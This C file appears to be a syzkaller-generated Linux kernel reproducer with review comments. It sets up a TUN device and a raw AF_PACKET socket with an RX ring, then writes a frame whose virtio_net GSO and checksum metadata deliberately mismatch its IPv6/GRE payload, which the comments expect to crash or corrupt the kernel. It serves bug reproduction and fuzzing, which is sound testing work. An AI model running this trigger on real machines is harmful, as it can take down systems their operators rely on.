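// autogenerated by syzkaller (https://github.com/google/syzkaller)
//
// Kernel reproducer: creates a TUN device with a virtio_net header, opens a
// raw AF_PACKET socket with PACKET_VNET_HDR and an RX ring, then writes one
// frame into the TUN fd whose virtio_net_hdr metadata (TCPv4 GSO, hdr_len
// 0x11, csum_offset 0xca6) does not match the IPv6/GRE payload behind it.
// Which kernel path this crashes is not recorded here — check the
// accompanying crash report before drawing conclusions.
//
// NOTE(review): the original listing had the names of all eight #include
// headers stripped by extraction; they are restored below from the names the
// program uses (htobe16/htobe32, uintN_t/intptr_t, memcpy/memset, syscall and
// __NR_*, write). This is syzkaller's standard include set.
//
// Run only in a disposable VM: a successful run is expected to crash or
// corrupt the kernel. TUNSETIFF and AF_PACKET typically need CAP_NET_ADMIN
// and CAP_NET_RAW respectively. The program keeps syzkaller's conventions on
// purpose — fixed-address RWX mappings, unchecked syscall results, raw
// pointer stores at absolute addresses — because the byte layout of the
// written frame IS the reproducer; do not "clean up" the stores.
#define _GNU_SOURCE
#include <endian.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

// Mask of bf_len bits starting at bit bf_off.
#define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
// Read-modify-write of one bitfield inside the integer of type `type` at
// `addr`; `htobe` is applied on load and store so big-endian bitfields can be
// expressed too (it is left empty for host-order fields below). Several
// invocations use uint16_t at an odd address: that is syzkaller's encoding of
// bitfields that straddle a byte boundary and is technically unaligned access.
#define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \
  *(type*)(addr) = \
      htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \
            (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))

// Resources produced by earlier calls: r[0] = tun fd, r[1] = AF_INET socket,
// r[2] = AF_PACKET socket. -1 means "call failed", and later calls are still
// issued with -1 (syzkaller semantics).
uint64_t r[3] = {0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffffff};

int main(void)
{
  // Guard pages below and above the 16 MiB RWX data region at 0x200000000000
  // where every argument buffer lives. Fresh MAP_ANONYMOUS memory is zero, so
  // any byte the program does not store explicitly is 0 when written out.
  syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
          /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
          /*fd=*/(intptr_t)-1, /*offset=*/0ul);
  syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
          /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
          /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
          /*fd=*/(intptr_t)-1, /*offset=*/0ul);
  syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
          /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
          /*fd=*/(intptr_t)-1, /*offset=*/0ul);
  intptr_t res = 0;
  // Progress marker; the result is deliberately ignored.
  if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
  }

  // openat$tun: open /dev/net/tun (fd -100 = AT_FDCWD) with
  // O_WRONLY|O_CREAT|O_TRUNC|O_NOATIME (0x40241). Returns r[0].
  memcpy((void*)0x200000000000, "/dev/net/tun\000", 13);
  res = syscall(__NR_openat, /*fd=*/0xffffffffffffff9cul,
                /*file=*/0x200000000000ul,
                /*flags=O_TRUNC|O_NOATIME|O_CREAT|O_WRONLY*/ 0x40241,
                /*mode=*/0);
  if (res != -1)
    r[0] = res;

  // ioctl$TUNSETIFF (0x400454ca) on the tun fd with
  // struct ifreq { ifr_name = "syzkaller1"; ifr_flags = 0xc201 }.
  // NOTE(review): 0xc201 looks like IFF_TUN|IFF_ATTACH_QUEUE|IFF_VNET_HDR|
  // IFF_TUN_EXCL per linux/if_tun.h — confirm. IFF_NO_PI is NOT set, which is
  // why the frame written below starts with a tun_pi header.
  memcpy((void*)0x200000000200, "syzkaller1\000\000\000\000\000\000", 16);
  *(uint16_t*)0x200000000210 = 0xc201;
  syscall(__NR_ioctl, /*fd=*/r[0], /*cmd=*/0x400454ca,
          /*arg=*/0x200000000200ul);

  // socket$kcm: socket(AF_INET, 0xa, 2). syzkaller labels type 0xa as
  // SOCK_DGRAM|0x8; it only serves as an fd for the SIOC* ioctl below.
  // Returns r[1].
  res = syscall(__NR_socket, /*domain=*/2ul, /*type=SOCK_DGRAM|0x8*/ 0xaul,
                /*proto=*/2);
  if (res != -1)
    r[1] = res;

  // ioctl$SIOCSIFHWADDR (0x8914), issued on r[1] (the AF_INET socket), for
  // interface "syzkaller1". syzkaller's description places a 6-byte
  // link-local MAC 01:80:c2:00:00:0e at ifr_ifru+0; remaining 18 bytes are 0.
  // NOTE(review): ifr_ifru+0 is where struct sockaddr.sa_family lives, so
  // the kernel does not necessarily see these bytes as that MAC — verify
  // against the tun device type before relying on this step.
  memcpy((void*)0x200000000180, "syzkaller1\000\000\000\000\000\000", 16);
  *(uint8_t*)0x200000000190 = 1;
  *(uint8_t*)0x200000000191 = 0x80;
  *(uint8_t*)0x200000000192 = 0xc2;
  *(uint8_t*)0x200000000193 = 0;
  *(uint8_t*)0x200000000194 = 0;
  *(uint8_t*)0x200000000195 = 0xe;
  syscall(__NR_ioctl, /*fd=*/r[1], /*cmd=*/0x8914, /*arg=*/0x200000000180ul);

  // socket$packet: socket(AF_PACKET (0x11), SOCK_RAW, htons(ETH_P_ALL)=0x300).
  // Returns r[2].
  res = syscall(__NR_socket, /*domain=*/0x11ul, /*type=SOCK_RAW*/ 3ul,
                /*proto=*/0x300);
  if (res != -1)
    r[2] = res;

  // setsockopt(r[2], SOL_PACKET (0x107), PACKET_VNET_HDR (0xf), &int{2}, 4):
  // ask for a virtio_net_hdr in front of every frame on the packet socket.
  *(uint32_t*)0x200000000240 = 2;
  syscall(__NR_setsockopt, /*fd=*/r[2], /*level=*/0x107,
          /*optname=PACKET_VNET_HDR*/ 0xf, /*optval=*/0x200000000240ul,
          /*optlen=*/4ul);

  // setsockopt(r[2], SOL_PACKET, PACKET_RX_RING (5), &tpacket_req3, 0x1c):
  //   tp_block_size = 0x1000, tp_block_nr = 0x3a,
  //   tp_frame_size = 0x1000, tp_frame_nr = 0x3a,
  //   tp_retire_blk_tov = tp_sizeof_priv = tp_feature_req_word = 0.
  // No PACKET_VERSION call precedes this, so which req layout the kernel
  // parses depends on the default version — not determinable from here.
  *(uint32_t*)0x200000000040 = 0x1000;
  *(uint32_t*)0x200000000044 = 0x3a;
  *(uint32_t*)0x200000000048 = 0x1000;
  *(uint32_t*)0x20000000004c = 0x3a;
  *(uint32_t*)0x200000000050 = 0;
  *(uint32_t*)0x200000000054 = 0;
  *(uint32_t*)0x200000000058 = 0;
  syscall(__NR_setsockopt, /*fd=*/r[2], /*level=*/0x107, /*optname=*/5,
          /*optval=*/0x200000000040ul, /*optlen=*/0x1cul);

  // write$tun: the frame, built at 0x2000000002c0. Offsets are relative to
  // that base. The explicitly stored bytes end at +0x7a (0x33a); the write
  // length 0xfdef covers ~65 KiB of trailing zeros from the fresh mapping and
  // stays inside the 16 MiB region. Ordering of the stores matters: the
  // uint16_t bitfield stores at odd addresses (e.g. +0x37, +0x3f, +0x43) also
  // clobber the following byte, which the next store then overwrites.
  //
  // +0x00 tun_pi        { flags = 0, proto = htons(ETH_P_IPV6 0x86dd) }
  *(uint16_t*)0x2000000002c0 = 0;
  *(uint16_t*)0x2000000002c2 = htobe16(0x86dd);
  // +0x04 virtio_net_hdr { flags = 0, gso_type = 1 (TCPV4), hdr_len = 0x11,
  //                        gso_size = 4, csum_start = 0, csum_offset = 0xca6 }
  // This is the security-relevant part: GSO/checksum metadata for a tiny
  // TCPv4 segment is attached to an IPv6/GRE frame, and csum_offset points
  // far beyond the 0x11-byte header it claims. The kernel's
  // virtio_net_hdr_to_skb() validation is the natural suspect — confirm
  // against the crash report.
  *(uint8_t*)0x2000000002c4 = 0;
  *(uint8_t*)0x2000000002c5 = 1;
  *(uint16_t*)0x2000000002c6 = 0x11;
  *(uint16_t*)0x2000000002c8 = 4;
  *(uint16_t*)0x2000000002ca = 0;
  *(uint16_t*)0x2000000002cc = 0xca6;
  // +0x0e IPv6 header: version 6 / priority 0xe, flow label ec 00 be,
  //       payload length 0x44 (does not match the bytes that follow),
  //       next header 0x2f (GRE), hop limit 0xff,
  //       src fe80::aa, dst ff02::1.
  STORE_BY_BITMASK(uint8_t, , 0x2000000002ce, 0xe, 0, 4);
  STORE_BY_BITMASK(uint8_t, , 0x2000000002ce, 6, 4, 4);
  memcpy((void*)0x2000000002cf, "\xec\x00\xbe", 3);
  *(uint16_t*)0x2000000002d2 = htobe16(0x44);
  *(uint8_t*)0x2000000002d4 = 0x2f;
  *(uint8_t*)0x2000000002d5 = -1;
  *(uint8_t*)0x2000000002d6 = 0xfe;
  *(uint8_t*)0x2000000002d7 = 0x80;
  memset((void*)0x2000000002d8, 0, 13);
  *(uint8_t*)0x2000000002e5 = 0xaa;
  *(uint8_t*)0x2000000002e6 = -1;
  *(uint8_t*)0x2000000002e7 = 2;
  memset((void*)0x2000000002e8, 0, 13);
  *(uint8_t*)0x2000000002f5 = 1;
  // +0x36 GRE (syzkaller "pptp" variant): C=0 R=0 K=1 S=0, version 1,
  //       protocol 0x88be, payload_len 0, key/call id 3.
  STORE_BY_BITMASK(uint16_t, , 0x2000000002f6, 0, 0, 1);
  STORE_BY_BITMASK(uint16_t, , 0x2000000002f6, 0, 1, 1);
  STORE_BY_BITMASK(uint16_t, , 0x2000000002f6, 1, 2, 1);
  STORE_BY_BITMASK(uint16_t, , 0x2000000002f6, 0, 3, 1);
  STORE_BY_BITMASK(uint16_t, , 0x2000000002f6, 0, 4, 4);
  STORE_BY_BITMASK(uint16_t, , 0x2000000002f7, 0, 0, 1);
  STORE_BY_BITMASK(uint16_t, , 0x2000000002f7, 0, 1, 4);
  STORE_BY_BITMASK(uint16_t, , 0x2000000002f7, 1, 5, 3);
  *(uint16_t*)0x2000000002f8 = htobe16(0x88be);
  *(uint16_t*)0x2000000002fa = htobe16(0);
  *(uint16_t*)0x2000000002fc = htobe16(3);
  // +0x3e GRE "cisco_ipv4": C=0 R=0 K=1 S=1, version 0, protocol 0x0800.
  STORE_BY_BITMASK(uint16_t, , 0x2000000002fe, 0, 0, 1);
  STORE_BY_BITMASK(uint16_t, , 0x2000000002fe, 0, 1, 1);
  STORE_BY_BITMASK(uint16_t, , 0x2000000002fe, 1, 2, 1);
  STORE_BY_BITMASK(uint16_t, , 0x2000000002fe, 1, 3, 1);
  STORE_BY_BITMASK(uint16_t, , 0x2000000002fe, 0, 4, 9);
  STORE_BY_BITMASK(uint16_t, , 0x2000000002ff, 0, 5, 3);
  *(uint16_t*)0x200000000300 = htobe16(0x800);
  // +0x42 GRE "cisco_ipv6": C=1 R=0 K=1 S=0, version 0, protocol 0x86dd.
  STORE_BY_BITMASK(uint16_t, , 0x200000000302, 1, 0, 1);
  STORE_BY_BITMASK(uint16_t, , 0x200000000302, 0, 1, 1);
  STORE_BY_BITMASK(uint16_t, , 0x200000000302, 1, 2, 1);
  STORE_BY_BITMASK(uint16_t, , 0x200000000302, 0, 3, 1);
  STORE_BY_BITMASK(uint16_t, , 0x200000000302, 0, 4, 9);
  STORE_BY_BITMASK(uint16_t, , 0x200000000303, 0, 5, 3);
  *(uint16_t*)0x200000000304 = htobe16(0x86dd);
  // +0x46 GRE "erspan1": H = 0xa888 (host order), protocol 0x88be, seq 2,
  //       ERSPAN v1 base header (vlan_upper 6, ver 1, vlan 9,
  //       session_id_upper 2, t 1, en 0, cos 3, session_id 5),
  //       version 1 (host order), md1.index = 0x88a8.
  *(uint16_t*)0x200000000306 = 0xa888;
  *(uint16_t*)0x200000000308 = htobe16(0x88be);
  *(uint32_t*)0x20000000030a = htobe32(2);
  STORE_BY_BITMASK(uint8_t, , 0x20000000030e, 6, 0, 4);
  STORE_BY_BITMASK(uint8_t, , 0x20000000030e, 1, 4, 4);
  STORE_BY_BITMASK(uint8_t, , 0x20000000030f, 9, 0, 8);
  STORE_BY_BITMASK(uint8_t, , 0x200000000310, 2, 0, 2);
  STORE_BY_BITMASK(uint8_t, , 0x200000000310, 1, 2, 1);
  STORE_BY_BITMASK(uint8_t, , 0x200000000310, 0, 3, 2);
  STORE_BY_BITMASK(uint8_t, , 0x200000000310, 3, 5, 3);
  STORE_BY_BITMASK(uint8_t, , 0x200000000311, 5, 0, 8);
  *(uint32_t*)0x200000000312 = 1;
  *(uint32_t*)0x200000000316 = htobe32(0x88a8);
  // +0x5a GRE "erspan2": H = 8 (host order), protocol 0x22eb, seq 0x20000,
  //       ERSPAN v2 base header (vlan_upper 0, ver 2, vlan 0xc,
  //       session_id_upper 0, t 0, en 2, cos 7, session_id 8),
  //       version 2 (host order), md2 { timestamp 2, sgt 4,
  //       hwid_upper 0, ft 5, p 1, o 1, gra 1, dir 0, hwid 0 }.
  *(uint16_t*)0x20000000031a = 8;
  *(uint16_t*)0x20000000031c = htobe16(0x22eb);
  *(uint32_t*)0x20000000031e = htobe32(0x20000);
  STORE_BY_BITMASK(uint8_t, , 0x200000000322, 0, 0, 4);
  STORE_BY_BITMASK(uint8_t, , 0x200000000322, 2, 4, 4);
  STORE_BY_BITMASK(uint8_t, , 0x200000000323, 0xc, 0, 8);
  STORE_BY_BITMASK(uint8_t, , 0x200000000324, 0, 0, 2);
  STORE_BY_BITMASK(uint8_t, , 0x200000000324, 0, 2, 1);
  STORE_BY_BITMASK(uint8_t, , 0x200000000324, 2, 3, 2);
  STORE_BY_BITMASK(uint8_t, , 0x200000000324, 7, 5, 3);
  STORE_BY_BITMASK(uint8_t, , 0x200000000325, 8, 0, 8);
  *(uint32_t*)0x200000000326 = 2;
  *(uint32_t*)0x20000000032a = htobe32(2);
  *(uint16_t*)0x20000000032e = htobe16(4);
  STORE_BY_BITMASK(uint8_t, , 0x200000000330, 0, 0, 2);
  STORE_BY_BITMASK(uint8_t, , 0x200000000330, 5, 2, 5);
  STORE_BY_BITMASK(uint8_t, , 0x200000000330, 1, 7, 1);
  STORE_BY_BITMASK(uint8_t, , 0x200000000331, 1, 0, 1);
  STORE_BY_BITMASK(uint8_t, , 0x200000000331, 1, 1, 2);
  STORE_BY_BITMASK(uint8_t, , 0x200000000331, 0, 3, 1);
  STORE_BY_BITMASK(uint8_t, , 0x200000000331, 0, 4, 1);
  // +0x72 GRE "teb": H = 8 (host order), protocol 0x6558, seq 2; empty
  //       payload. Everything after +0x7a is zero.
  *(uint16_t*)0x200000000332 = 8;
  *(uint16_t*)0x200000000334 = htobe16(0x6558);
  *(uint32_t*)0x200000000336 = htobe32(2);
  // Deliver the frame to the kernel through the TUN fd. count = 0xfdef.
  syscall(__NR_write, /*fd=*/r[0], /*buf=*/0x2000000002c0ul,
          /*count=*/0xfdeful);
  return 0;
}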